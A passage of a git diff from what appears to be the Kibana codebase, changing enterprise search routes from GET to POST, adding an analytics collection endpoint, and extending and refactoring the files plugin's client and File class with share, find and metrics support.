addAnalyticsCollection } from '../../lib/analytics/add_analytics_collection'; +import { RouteDependencies } from '../../plugin'; +import { createError } from '../../utils/create_error'; +import { elasticsearchErrorHandler } from '../../utils/elasticsearch_error_handler'; + +export function registerAnalyticsRoutes({ router, log }: RouteDependencies) { + router.post( + { + path: '/internal/enterprise_search/analytics/collections', + validate: { + body: schema.object({ + name: schema.string(), + }), + }, + }, + elasticsearchErrorHandler(log, async (context, request, response) => { + const { client } = (await context.core).elasticsearch; + try { + const body = await addAnalyticsCollection(client, request.body); + return response.ok({ body }); + } catch (error) { + if ((error as Error).message === ErrorCode.ANALYTICS_COLLECTION_ALREADY_EXISTS) { + return createError({ + errorCode: (error as Error).message as ErrorCode, + message: i18n.translate( + 'xpack.enterpriseSearch.server.routes.addAnalyticsCollection.analyticsCollectionExistsError', + { + defaultMessage: 'Analytics collection already exists', + } + ), + response, + statusCode: 409, + }); + } + throw error; + } + }) + ); +} diff --git a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/indices.ts b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/indices.ts index 25ecd295ceb35..5d5f72c297727 100644 --- a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/indices.ts +++ b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/indices.ts @@ -27,7 +27,7 @@ export function registerIndexRoutes({ router, log }: RouteDependencies) { { path: '/internal/enterprise_search/search_indices', validate: false }, elasticsearchErrorHandler(log, async (context, _, response) => { const { client } = (await context.core).elasticsearch; - const indices = await fetchIndices(client, '*', false, true); + const indices = await fetchIndices(client, '*', false, true, 'search-'); return response.ok({ body: indices, diff --git a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.test.ts b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.test.ts index ac6d8b70fde07..0004d178f7796 100644 --- a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.test.ts +++ b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.test.ts @@ -27,8 +27,8 @@ describe('Elasticsearch Search', () => { mockRouter = new MockRouter({ context, - method: 'get', - path: '/internal/enterprise_search/indices/{index_name}/search/{query}', + method: 'post', + path: '/internal/enterprise_search/indices/{index_name}/search', }); registerSearchRoute({ @@ -37,14 +37,9 @@ describe('Elasticsearch Search', () => { }); }); - describe('GET /internal/enterprise_search/indices/{index_name}/search/{query}', () => { + describe('POST /internal/enterprise_search/indices/{index_name}/search with query on request body', () => { it('fails validation without index_name', () => { - const request = { params: { query: 'banana' } }; - mockRouter.shouldThrow(request); - }); - - it('fails validation without query', () => { - const request = { params: { index_name: 'search-banana' } }; + const request = { body: { searchQuery: '' }, params: {} }; mockRouter.shouldThrow(request); }); @@ -73,7 +68,10 @@ describe('Elasticsearch Search', () => { }); await mockRouter.callRoute({ - params: { index_name: 'search-index-name', query: 'banana' }, + body: { + searchQuery: 'banana', + }, + params: { index_name: 'search-index-name' }, }); expect(fetchSearchResults).toHaveBeenCalledWith( @@ -102,7 +100,7 @@ describe('Elasticsearch Search', () => { }); }); - describe('GET /internal/enterprise_search/indices/{index_name}/search', () => { + describe('POST /internal/enterprise_search/indices/{index_name}/search', () => { let mockRouterNoQuery: MockRouter; beforeEach(() => { const context = { @@ -111,7 +109,7 @@ describe('Elasticsearch Search', () => { mockRouterNoQuery = new MockRouter({ context, - method: 'get', + method: 'post', path: '/internal/enterprise_search/indices/{index_name}/search', }); diff --git a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.ts b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.ts index 7e51d00aa2537..3ea14a2013a59 100644 --- a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.ts +++ b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.ts @@ -37,52 +37,17 @@ const calculateMeta = (searchResults: SearchResponseBody, page: number, size: nu }; export function registerSearchRoute({ router, log }: RouteDependencies) { - router.get( + router.post( { path: '/internal/enterprise_search/indices/{index_name}/search', validate: { - params: schema.object({ - index_name: schema.string(), - }), - query: schema.object({ - page: schema.number({ defaultValue: 0, min: 0 }), - size: schema.number({ - defaultValue: ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT, - min: 0, + body: schema.object({ + searchQuery: schema.string({ + defaultValue: '', }), }), - }, - }, - elasticsearchErrorHandler(log, async (context, request, response) => { - const indexName = decodeURIComponent(request.params.index_name); - const { client } = (await context.core).elasticsearch; - const { page = 0, size = ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT } = request.query; - const from = page * size; - const searchResults: SearchResponseBody = await fetchSearchResults( - client, - indexName, - '', - from, - size - ); - - return response.ok({ - body: { - meta: calculateMeta(searchResults, page, size), - results: searchResults, - }, - headers: { 'content-type': 'application/json' }, - }); - }) - ); - - router.get( - { - path: '/internal/enterprise_search/indices/{index_name}/search/{query}', - validate: { params: schema.object({ index_name: schema.string(), - query: schema.string(), }), query: schema.object({ page: schema.number({ defaultValue: 0, min: 0 }), @@ -95,14 +60,14 @@ export function registerSearchRoute({ router, log }: RouteDependencies) { }, elasticsearchErrorHandler(log, async (context, request, response) => { const indexName = decodeURIComponent(request.params.index_name); + const searchQuery = request.body.searchQuery; const { client } = (await context.core).elasticsearch; const { page = 0, size = ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT } = request.query; const from = page * size; - - const searchResults = await fetchSearchResults( + const searchResults: SearchResponseBody = await fetchSearchResults( client, indexName, - request.params.query, + searchQuery, from, size ); diff --git a/x-pack/plugins/event_log/scripts/create_schemas.js b/x-pack/plugins/event_log/scripts/create_schemas.js index 1a775b44add8d..dc4eeb01c8957 100755 --- a/x-pack/plugins/event_log/scripts/create_schemas.js +++ b/x-pack/plugins/event_log/scripts/create_schemas.js @@ -9,7 +9,7 @@ const fs = require('fs'); const path = require('path'); -const { set } = require('@elastic/safer-lodash-set'); +const { set } = require('@kbn/safer-lodash-set'); const lodash = require('lodash'); const LineWriter = require('./lib/line_writer'); diff --git a/x-pack/plugins/files/common/types.ts b/x-pack/plugins/files/common/types.ts index 2fef7ab3f17c4..d3c8795fc7321 100644 --- a/x-pack/plugins/files/common/types.ts +++ b/x-pack/plugins/files/common/types.ts @@ -332,7 +332,16 @@ export interface FileUnshareOptions { * A class with set of properties and behaviors of the "smart" file object and adds * behaviours for interacting with files on top of the pure data. */ -export interface File extends FileJSON { +export interface File { + /** + * The file ID + */ + id: string; + + /** + * File metadata in camelCase form. + */ + data: FileJSON; /** * Update a file object's metadatathat can be updated. * @@ -345,7 +354,7 @@ export interface File extends FileJSON { * * @param content - The content to stream to storage. */ - uploadContent(content: Readable): Promise; + uploadContent(content: Readable): Promise>; /** * Stream file content from storage. diff --git a/x-pack/plugins/files/public/files_client/files_client.test.ts b/x-pack/plugins/files/public/files_client/files_client.test.ts new file mode 100644 index 0000000000000..7b5ead0c03d0a --- /dev/null +++ b/x-pack/plugins/files/public/files_client/files_client.test.ts @@ -0,0 +1,56 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { apiRoutes } from './files_client'; + +describe('apiRoutes', () => { + test('generates expected paths', () => { + expect(apiRoutes.getCreateFileRoute('test')).toMatchInlineSnapshot(`"/api/files/files/test"`); + + expect(apiRoutes.getUploadRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/files/test/123/blob"` + ); + + expect(apiRoutes.getDownloadRoute('test', '123', 'my-file.png')).toMatchInlineSnapshot( + `"/api/files/files/test/123/blob/my-file.png"` + ); + + expect(apiRoutes.getUpdateRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/files/test/123"` + ); + + expect(apiRoutes.getDeleteRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/files/test/123"` + ); + + expect(apiRoutes.getListRoute('test', 1, 1)).toMatchInlineSnapshot( + `"/api/files/files/test/list?page=1&perPage=1"` + ); + + expect(apiRoutes.getByIdRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/files/test/123"` + ); + + expect(apiRoutes.getShareRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/shares/test/123"` + ); + + expect(apiRoutes.getListSharesRoute('test', 1, 1)).toMatchInlineSnapshot( + `"/api/files/shares/test?page=1&perPage=1"` + ); + + expect(apiRoutes.getPublicDownloadRoute('test', 'my-file.pdf')).toMatchInlineSnapshot( + `"/api/files/public/blob/my-file.pdf?token=test"` + ); + + expect(apiRoutes.getFindRoute(1, 1)).toMatchInlineSnapshot( + `"/api/files/find?page=1&perPage=1"` + ); + + expect(apiRoutes.getMetricsRoute()).toMatchInlineSnapshot(`"/api/files/metrics"`); + }); +}); diff --git a/x-pack/plugins/files/public/files_client/files_client.ts b/x-pack/plugins/files/public/files_client/files_client.ts index ffa8e815368f0..3abd6c935541c 100644 --- a/x-pack/plugins/files/public/files_client/files_client.ts +++ b/x-pack/plugins/files/public/files_client/files_client.ts @@ -5,23 +5,64 @@ * 2.0. */ +import { pipe } from 'fp-ts/lib/function'; import * as qs from 'query-string'; import type { HttpStart } from '@kbn/core/public'; import type { FilesClient } from '../types'; -import { FILES_API_BASE_PATH } from '../../common/api_routes'; +import { + API_BASE_PATH, + FILES_API_BASE_PATH, + FILES_PUBLIC_API_BASE_PATH, + FILES_SHARE_API_BASE_PATH, +} from '../../common/api_routes'; -const apiRoutes = { +const addQueryParams = + (queryParams: object) => + (path: string): string => { + const stringified = qs.stringify(queryParams); + return `${path}${stringified ? `?${stringified}` : ''}`; + }; + +/** + * @internal + */ +export const apiRoutes = { + /** + * Scoped to file kind + */ getCreateFileRoute: (fileKind: string) => `${FILES_API_BASE_PATH}/${fileKind}`, getUploadRoute: (fileKind: string, id: string) => `${FILES_API_BASE_PATH}/${fileKind}/${id}/blob`, getDownloadRoute: (fileKind: string, id: string, fileName?: string) => - `${FILES_API_BASE_PATH}/${fileKind}/${id}/blob/${fileName ? fileName : ''}`, + `${FILES_API_BASE_PATH}/${fileKind}/${id}/blob${fileName ? '/' + fileName : ''}`, getUpdateRoute: (fileKind: string, id: string) => `${FILES_API_BASE_PATH}/${fileKind}/${id}`, getDeleteRoute: (fileKind: string, id: string) => `${FILES_API_BASE_PATH}/${fileKind}/${id}`, getListRoute: (fileKind: string, page?: number, perPage?: number) => { - const qParams = qs.stringify({ page, perPage }); - return `${FILES_API_BASE_PATH}/${fileKind}/list${qParams ? `?${qParams}` : ''}`; + return pipe(`${FILES_API_BASE_PATH}/${fileKind}/list`, addQueryParams({ page, perPage })); }, getByIdRoute: (fileKind: string, id: string) => `${FILES_API_BASE_PATH}/${fileKind}/${id}`, + + /** + * Scope to file shares and file kind + */ + getShareRoute: (fileKind: string, id: string) => `${FILES_SHARE_API_BASE_PATH}/${fileKind}/${id}`, + getListSharesRoute: (fileKind: string, page?: number, perPage?: number, forFileId?: string) => + pipe(`${FILES_SHARE_API_BASE_PATH}/${fileKind}`, addQueryParams({ page, perPage, forFileId })), + + /** + * Public routes + */ + getPublicDownloadRoute: (token: string, fileName?: string) => + pipe( + `${FILES_PUBLIC_API_BASE_PATH}/blob${fileName ? '/' + fileName : ''}`, + addQueryParams({ token }) + ), + + /** + * Top-level routes + */ + getFindRoute: (page?: number, perPage?: number) => + pipe(`${API_BASE_PATH}/find`, addQueryParams({ page, perPage })), + getMetricsRoute: () => `${API_BASE_PATH}/metrics`, }; interface Args { @@ -29,40 +70,72 @@ interface Args { http: HttpStart; } +const commonBodyHeaders = { + headers: { + 'content-type': 'application/json', + }, +}; + export const createFilesClient = ({ http, fileKind }: Args): FilesClient => { return { - create(args) { + create: (args) => { return http.post(apiRoutes.getCreateFileRoute(fileKind), { - headers: { - 'content-type': 'application/json', - }, + headers: commonBodyHeaders, body: JSON.stringify(args), }); }, - delete(args) { + delete: (args) => { return http.delete(apiRoutes.getDeleteRoute(fileKind, args.id)); }, - download(args) { + download: (args) => { return http.get(apiRoutes.getDownloadRoute(fileKind, args.id, args.fileName)); }, - getById(args) { + getById: (args) => { return http.get(apiRoutes.getByIdRoute(fileKind, args.id)); }, - list(args) { - return http.get(apiRoutes.getListRoute(fileKind, args.page, args.perPage)); + list: ({ page, perPage }) => { + return http.get(apiRoutes.getListRoute(fileKind, page, perPage)); }, - update({ id, ...body }) { + update: ({ id, ...body }) => { return http.patch(apiRoutes.getUpdateRoute(fileKind, id), { - headers: { - 'content-type': 'application/json', - }, + headers: commonBodyHeaders, body: JSON.stringify(body), }); }, - upload(args) { + upload: (args) => { return http.put(apiRoutes.getUploadRoute(fileKind, args.id), { + headers: { + 'content-type': 'application/octet-stream', + }, body: args.body, }); }, + share: ({ fileId, name, validUntil }) => { + return http.post(apiRoutes.getShareRoute(fileKind, fileId), { + headers: commonBodyHeaders, + body: JSON.stringify({ name, validUntil }), + }); + }, + unshare: ({ id }) => { + return http.delete(apiRoutes.getShareRoute(fileKind, id)); + }, + getShare: ({ id }) => { + return http.get(apiRoutes.getShareRoute(fileKind, id)); + }, + listShares: ({ forFileId, page, perPage }) => { + return http.get(apiRoutes.getListSharesRoute(fileKind, page, perPage, forFileId)); + }, + find: ({ page, perPage, ...filterArgs }) => { + return http.post(apiRoutes.getFindRoute(page, perPage), { + headers: commonBodyHeaders, + body: JSON.stringify(filterArgs), + }); + }, + getMetrics: () => { + return http.get(apiRoutes.getMetricsRoute()); + }, + publicDownload: ({ token, fileName }) => { + return http.get(apiRoutes.getPublicDownloadRoute(token, fileName)); + }, }; }; diff --git a/x-pack/plugins/files/public/types.ts b/x-pack/plugins/files/public/types.ts index a260e1e08a067..24a3125213020 100644 --- a/x-pack/plugins/files/public/types.ts +++ b/x-pack/plugins/files/public/types.ts @@ -6,14 +6,21 @@ */ import type { - HttpApiInterfaceEntryDefinition, - CreateFileKindHttpEndpoint, - DeleteFileKindHttpEndpoint, - DownloadFileKindHttpEndpoint, - GetByIdFileKindHttpEndpoint, + FindFilesHttpEndpoint, + FileShareHttpEndpoint, + FileUnshareHttpEndpoint, + FileGetShareHttpEndpoint, + FilesMetricsHttpEndpoint, ListFileKindHttpEndpoint, + CreateFileKindHttpEndpoint, + FileListSharesHttpEndpoint, UpdateFileKindHttpEndpoint, UploadFileKindHttpEndpoint, + DeleteFileKindHttpEndpoint, + GetByIdFileKindHttpEndpoint, + DownloadFileKindHttpEndpoint, + FilePublicDownloadHttpEndpoint, + HttpApiInterfaceEntryDefinition, } from '../common/api_routes'; /** @@ -51,6 +58,12 @@ export interface FilesClient { * @param args - list files args */ list: ClientMethodFrom; + /** + * Find a set of files given some filters. + * + * @param args - File filters + */ + find: ClientMethodFrom; /** * Update a set of of metadata values of the file object. * @@ -69,6 +82,47 @@ export interface FilesClient { * @param args - download file args */ download: ClientMethodFrom; + /** + * Share a file by creating a new file share instance. + * + * @note This returns the secret token that can be used + * to access a file via the public download enpoint. + * + * @param args - File share arguments + */ + share: ClientMethodFrom; + /** + * Delete a file share instance. + * + * @param args - File unshare arguments + */ + unshare: ClientMethodFrom; + /** + * Get a file share instance. + * + * @param args - Get file share arguments + */ + getShare: ClientMethodFrom; + /** + * List all file shares. Optionally scoping to a specific + * file. + * + * @param args - Get file share arguments + */ + listShares: ClientMethodFrom; + /** + * Get metrics of file system, like storage usage. + * + * @param args - Get metrics arguments + */ + getMetrics: ClientMethodFrom; + /** + * Download a file, bypassing regular security by way of a + * secret share token. + * + * @param args - Get public download arguments. + */ + publicDownload: ClientMethodFrom; } /** diff --git a/x-pack/plugins/files/server/file/file.test.ts b/x-pack/plugins/files/server/file/file.test.ts index ebb1efe32422c..1b86af89ba61c 100644 --- a/x-pack/plugins/files/server/file/file.test.ts +++ b/x-pack/plugins/files/server/file/file.test.ts @@ -82,4 +82,14 @@ describe('File', () => { await setImmediate(); expect(blobStoreSpy.calledOnce).toBe(true); }); + + it('updates file data after upload', async () => { + const fileSO = { attributes: { Status: 'AWAITING_UPLOAD' } }; + (soClient.create as jest.Mock).mockResolvedValue(fileSO); + (soClient.update as jest.Mock).mockResolvedValue(fileSO); + + const file = await fileService.createFile({ name: 'test', fileKind }); + await file.uploadContent(Readable.from(['test'])); + expect(file.data.status).toBe('READY'); + }); }); diff --git a/x-pack/plugins/files/server/file/file.ts b/x-pack/plugins/files/server/file/file.ts index 00544a7e14f08..bdf85af1bec0e 100644 --- a/x-pack/plugins/files/server/file/file.ts +++ b/x-pack/plugins/files/server/file/file.ts @@ -6,27 +6,11 @@ */ import { Logger } from '@kbn/core/server'; -import mimeType from 'mime'; import { Readable } from 'stream'; -import type { FileCompression, FileShareJSON, FileShareJSONWithToken } from '../../common/types'; -import type { - File as IFile, - FileKind, - FileMetadata, - FileStatus, - UpdatableFileMetadata, - FileJSON, -} from '../../common'; -import { - fileAttributesReducer, - Action, - createDefaultFileAttributes, -} from './file_attributes_reducer'; -import { createAuditEvent } from '../audit_events'; -import { InternalFileService } from '../file_service/internal_file_service'; -import { InternalFileShareService } from '../file_share_service'; +import type { FileShareJSON, FileShareJSONWithToken } from '../../common/types'; +import type { File as IFile, UpdatableFileMetadata, FileJSON } from '../../common'; +import { fileAttributesReducer, Action } from './file_attributes_reducer'; import type { FileClientImpl } from '../file_client/file_client'; -import { toJSON } from './to_json'; import { AlreadyDeletedError, ContentAlreadyUploadedError, @@ -35,46 +19,37 @@ import { } from './errors'; /** - * Public class that provides all data and functionality consumers will need at the - * individual file level + * Scopes file actions to an ID and set of attributes. * - * @note Instantiation should not happen outside of this plugin + * Also exposes the upload and download functionality. */ export class File implements IFile { - private readonly logAuditEvent: InternalFileService['writeAuditLog']; - constructor( public readonly id: string, - private fileMetadata: FileMetadata, + private metadata: FileJSON, private readonly fileClient: FileClientImpl, - private readonly internalFileService: InternalFileService, - private readonly fileShareService: InternalFileShareService, private readonly logger: Logger - ) { - this.logAuditEvent = this.internalFileService.writeAuditLog.bind(this.internalFileService); - } + ) {} - private async updateFileState(action: Action) { - const { metadata } = await this.fileClient.update({ - id: this.id, - metadata: fileAttributesReducer(this.metadata, action), - }); - this.fileMetadata = metadata; + private async updateFileState(action: Action): Promise { + const metadata = fileAttributesReducer(this.data, action); + await this.fileClient.internalUpdate(this.id, metadata); + this.data = metadata as FileJSON; } private isReady(): boolean { - return this.status === 'READY'; + return this.data.status === 'READY'; } private isDeleted(): boolean { - return this.status === 'DELETED'; + return this.data.status === 'DELETED'; } private uploadInProgress(): boolean { - return this.status === 'UPLOADING'; + return this.data.status === 'UPLOADING'; } - public async update(attrs: Partial): Promise { + public async update(attrs: Partial): Promise> { await this.updateFileState({ action: 'updateFile', payload: attrs, @@ -82,14 +57,14 @@ export class File implements IFile { return this; } - public async uploadContent(content: Readable): Promise { + public async uploadContent(content: Readable): Promise> { if (this.uploadInProgress()) { throw new UploadInProgressError('Upload already in progress.'); } if (this.isReady()) { throw new ContentAlreadyUploadedError('Already uploaded file content.'); } - this.logger.debug(`Uploading file [id = ${this.id}][name = ${this.name}].`); + this.logger.debug(`Uploading file [id = ${this.id}][name = ${this.data.name}].`); await this.updateFileState({ action: 'uploading', }); @@ -100,6 +75,7 @@ export class File implements IFile { action: 'uploaded', payload: { size }, }); + return this; } catch (e) { await this.updateFileState({ action: 'uploadError' }); this.fileClient.deleteContent(this.id).catch(() => {}); // Best effort to remove any uploaded content @@ -108,7 +84,7 @@ export class File implements IFile { } public downloadContent(): Promise { - const { size } = this.metadata; + const { size } = this.data; if (!this.isReady()) { throw new NoDownloadAvailableError('This file content is not available for download.'); } @@ -126,142 +102,38 @@ export class File implements IFile { await this.updateFileState({ action: 'delete', }); - // Stop sharing this file - await this.fileShareService.deleteForFile({ file: this }); await this.fileClient.delete({ id: this.id, hasContent: this.isReady() }); - this.logAuditEvent( - createAuditEvent({ - action: 'delete', - outcome: 'success', - message: `Deleted file "${this.name}" of kind "${this.fileKind}" with id "${this.id}"`, - }) - ); } public async share({ name, validUntil, }: { - name?: string; + name: string; validUntil?: number; }): Promise { - const shareObject = await this.fileShareService.share({ file: this, name, validUntil }); - this.internalFileService.writeAuditLog( - createAuditEvent({ - action: 'create', - message: `Shared file "${this.name}" with id "${this.id}"`, - }) - ); - return shareObject; + return this.fileClient.share({ name, validUntil, file: this }); } async listShares(): Promise { - const { shares } = await this.fileShareService.list({ fileId: this.id }); + const { shares } = await this.fileClient.listShares({ + fileId: this.id, + }); return shares; } async unshare(opts: { shareId: string }): Promise { - await this.fileShareService.delete({ id: opts.shareId }); - this.internalFileService.writeAuditLog( - createAuditEvent({ - action: 'delete', - message: `Removed share for "${this.name}" with id "${this.id}"`, - }) - ); + await this.fileClient.unshare({ id: opts.shareId }); } public toJSON(): FileJSON { - return toJSON(this.id, this.metadata); - } - - private get metadata(): FileMetadata { - return this.fileMetadata; - } - - public get created(): string { - return this.metadata.created; - } - - public get updated(): string { - return this.metadata.Updated; - } - - public get chunkSize(): number | undefined { - return this.metadata.ChunkSize; - } - - public get fileKind(): string { - return this.fileClient.fileKind; - } - - public get name(): string { - return this.metadata.name; + return this.data; } - public get status(): FileStatus { - return this.metadata.Status; + public get data(): FileJSON { + return this.metadata; } - - public get compression(): undefined | FileCompression { - return this.metadata.Compression; - } - - public get size(): undefined | number { - return this.metadata.size; - } - - public get meta(): M { - return this.metadata.Meta as M; - } - - public get alt(): undefined | string { - return this.metadata.Alt; - } - - public get mimeType(): undefined | string { - return this.metadata.mime_type; - } - - public get extension(): undefined | string { - return this.metadata.extension; - } - - /** - * Static method for creating files so that we can keep all of the audit logging for files - * in the same place. - */ - public static async create( - { - name, - fileKind, - alt, - meta, - mime, - }: { name: string; fileKind: FileKind; alt?: string; meta?: unknown; mime?: string }, - internalFileService: InternalFileService, - fileClient: FileClientImpl - ) { - const fileMeta = await fileClient.create({ - metadata: { - ...createDefaultFileAttributes(), - name, - mime_type: mime, - Alt: alt, - Meta: meta, - FileKind: fileKind.id, - extension: (mime && mimeType.getExtension(mime)) ?? undefined, - }, - }); - - const file = internalFileService.toFile(fileMeta.id, fileMeta.metadata, fileKind, fileClient); - - internalFileService.writeAuditLog( - createAuditEvent({ - action: 'create', - message: `Created file "${file.name}" of kind "${file.fileKind}" and id "${file.id}"`, - }) - ); - - return file; + private set data(v: FileJSON) { + this.metadata = v; } } diff --git a/x-pack/plugins/files/server/file/file_attributes_reducer.ts b/x-pack/plugins/files/server/file/file_attributes_reducer.ts index 93bf2f74545d9..fdb2768408af5 100644 --- a/x-pack/plugins/files/server/file/file_attributes_reducer.ts +++ b/x-pack/plugins/files/server/file/file_attributes_reducer.ts @@ -4,8 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import moment from 'moment'; -import { FileMetadata, UpdatableFileMetadata } from '../../common'; +import { FileJSON, UpdatableFileMetadata } from '../../common'; export type Action = | { @@ -20,51 +19,32 @@ export type Action = | { action: 'uploadError'; payload?: undefined } | { action: 'updateFile'; payload: Partial }; -export function createDefaultFileAttributes(): Pick< - FileMetadata, - 'created' | 'Updated' | 'Status' -> { - const dateString = new Date().toISOString(); - return { - created: dateString, - Status: 'AWAITING_UPLOAD', - Updated: dateString, - }; -} - -export function fileAttributesReducer( - state: FileMetadata, - { action, payload }: Action -): FileMetadata { +export function fileAttributesReducer(state: FileJSON, { action, payload }: Action): FileJSON { switch (action) { case 'delete': - return { ...state, Status: 'DELETED' }; + return { ...state, status: 'DELETED' }; case 'uploading': return { ...state, - Status: 'UPLOADING', - Updated: moment().toISOString(), + status: 'UPLOADING', }; case 'uploaded': return { ...state, ...payload, - Status: 'READY', - Updated: moment().toISOString(), + status: 'READY', }; case 'uploadError': return { ...state, - Status: 'UPLOAD_ERROR', - Updated: moment().toISOString(), + status: 'UPLOAD_ERROR', }; case 'updateFile': return { ...state, name: payload.name ?? state.name, - Alt: payload.alt ?? state.Alt, - Meta: payload.meta ?? state.Meta, - Updated: moment().toISOString(), + alt: payload.alt ?? state.alt, + meta: payload.meta ?? state.meta, }; default: return state; diff --git a/x-pack/plugins/files/server/file/index.ts b/x-pack/plugins/files/server/file/index.ts index 02740d7eaab6d..2b584945cb71f 100644 --- a/x-pack/plugins/files/server/file/index.ts +++ b/x-pack/plugins/files/server/file/index.ts @@ -9,6 +9,6 @@ import * as fileErrors from './errors'; export { File } from './file'; export { toJSON } from './to_json'; -export { createDefaultFileAttributes, fileAttributesReducer } from './file_attributes_reducer'; +export { fileAttributesReducer } from './file_attributes_reducer'; export type { Action } from './file_attributes_reducer'; export { fileErrors }; diff --git a/x-pack/plugins/files/server/file/to_json.ts b/x-pack/plugins/files/server/file/to_json.ts index 390aa1672e06e..98096940fe75f 100644 --- a/x-pack/plugins/files/server/file/to_json.ts +++ b/x-pack/plugins/files/server/file/to_json.ts @@ -5,8 +5,28 @@ * 2.0. */ +import { pickBy } from 'lodash'; import type { FileMetadata, FileJSON } from '../../common/types'; +export function serializeJSON(attrs: Partial): Partial { + const { name, mimeType, size, created, updated, fileKind, status, alt, extension, meta } = attrs; + return pickBy( + { + name, + mime_type: mimeType, + size, + created, + extension, + Alt: alt, + Status: status, + Meta: meta as M, + Updated: updated, + FileKind: fileKind, + }, + (v) => v != null + ); +} + export function toJSON(id: string, attrs: FileMetadata): FileJSON { const { name, @@ -20,17 +40,20 @@ export function toJSON(id: string, attrs: FileMetadata): FileJSON>( + { + id, + name, + mimeType, + size, + created, + extension, + alt: Alt, + status: Status, + meta: Meta as M, + updated: Updated, + fileKind: FileKind, + }, + (v) => v != null + ) as FileJSON; } diff --git a/x-pack/plugins/files/server/file_client/create_es_file_client.ts b/x-pack/plugins/files/server/file_client/create_es_file_client.ts index 2ffb9bd458c6d..9f453a6a25bfc 100644 --- a/x-pack/plugins/files/server/file_client/create_es_file_client.ts +++ b/x-pack/plugins/files/server/file_client/create_es_file_client.ts @@ -7,7 +7,8 @@ import type { Logger, ElasticsearchClient } from '@kbn/core/server'; import { ElasticsearchBlobStorageClient } from '../blob_storage_service'; -import { FileClientImpl, FileClient } from './file_client'; +import { FileClientImpl } from './file_client'; +import type { FileClient } from './types'; import { EsIndexFilesMetadataClient } from './file_metadata_client'; const NO_FILE_KIND = 'none'; @@ -55,6 +56,9 @@ export function createEsFileClient(arg: CreateEsFileClientArgs): FileClient { maxSizeBytes, }, new EsIndexFilesMetadataClient(metadataIndex, elasticsearchClient, logger), - new ElasticsearchBlobStorageClient(elasticsearchClient, blobStorageIndex, undefined, logger) + new ElasticsearchBlobStorageClient(elasticsearchClient, blobStorageIndex, undefined, logger), + undefined, + undefined, + logger ); } diff --git a/x-pack/plugins/files/server/file_client/file_client.ts b/x-pack/plugins/files/server/file_client/file_client.ts index cc9a4a6de2994..595d0095a6625 100644 --- a/x-pack/plugins/files/server/file_client/file_client.ts +++ b/x-pack/plugins/files/server/file_client/file_client.ts @@ -4,165 +4,170 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ +import moment from 'moment'; import { Readable } from 'stream'; +import mimeType from 'mime'; import cuid from 'cuid'; -import { FileKind, FileMetadata } from '../../common/types'; +import type { Logger } from '@kbn/core/server'; +import type { AuditLogger } from '@kbn/security-plugin/server'; +import type { + File, + FileJSON, + FileKind, + FileMetadata, + FileShareJSONWithToken, + UpdatableFileMetadata, +} from '../../common/types'; import type { FileMetadataClient } from './file_metadata_client'; import type { BlobStorageClient, UploadOptions as BlobUploadOptions, } from '../blob_storage_service'; +import { File as FileImpl } from '../file'; +import { FileShareServiceStart, InternalFileShareService } from '../file_share_service'; import { enforceMaxByteSizeTransform } from './stream_transforms'; - -export interface DeleteArgs { - /** ID of the file to delete */ - id: string; - /** - * If `true`, the file will be deleted from the blob storage. - * - * @default true - */ - hasContent?: boolean; -} - -/** - * Args to create a file - */ -export interface CreateArgs { - /** - * Unique file ID - */ - id?: string; - /** - * The file's metadata - */ - metadata: Omit & { FileKind?: string }; -} +import { createAuditEvent } from '../audit_events'; +import type { FileClient, CreateArgs, DeleteArgs, P1, ShareArgs } from './types'; +import { serializeJSON, toJSON } from '../file/to_json'; +import { createDefaultFileAttributes } from './utils'; export type UploadOptions = Omit; -/** - * Wraps the {@link FileMetadataClient} and {@link BlobStorageClient} client - * to provide basic file CRUD functionality. - * - * For now this is just a shallow type of the implementation for export purposes. - */ -export interface FileClient { - /** See {@link FileMetadata.FileKind}. */ - fileKind: string; - - /** - * See {@link FileMetadataClient.create}. - * - * @param arg - Arg to create a file. - * */ - create(arg: CreateArgs): ReturnType; - - /** - * See {@link FileMetadataClient.get} - * - * @param arg - Argument to get a file - */ - get: FileMetadataClient['get']; - - /** - * {@link FileMetadataClient.update} - * - * @param arg - Argument to get a file - */ - update: FileMetadataClient['update']; - - /** - * Delete a file. - * @param arg - Argument to delete a file - */ - delete(arg: DeleteArgs): Promise; - - /** - * See {@link BlobStorageClient.delete} - * - * @param id - Argument to delete a file - */ - deleteContent: BlobStorageClient['delete']; - - /** - * See {@link FileMetadataClient.list} - * - * @param arg - Argument to list files - */ - list: FileMetadataClient['list']; - - /** - * See {@link FileMetadataClient.find}. - * - * @param arg - Argument to find files - */ - find: FileMetadataClient['find']; - - /** - * See {@link BlobStorageClient.upload} - * - * @param id - Readable stream to upload - * @param rs - Readable stream to upload - * @param opts - Argument for uploads - */ - upload(id: string, rs: Readable, opts?: UploadOptions): ReturnType; - - /** - * See {@link BlobStorageClient.download} - * - * @param args - to download a file - */ - download: BlobStorageClient['download']; +export function createFileClient({ + fileKindDescriptor, + auditLogger, + blobStorageClient, + internalFileShareService, + logger, + metadataClient, +}: { + fileKindDescriptor: FileKind; + metadataClient: FileMetadataClient; + blobStorageClient: BlobStorageClient; + internalFileShareService: undefined | InternalFileShareService; + auditLogger: undefined | AuditLogger; + logger: Logger; +}) { + return new 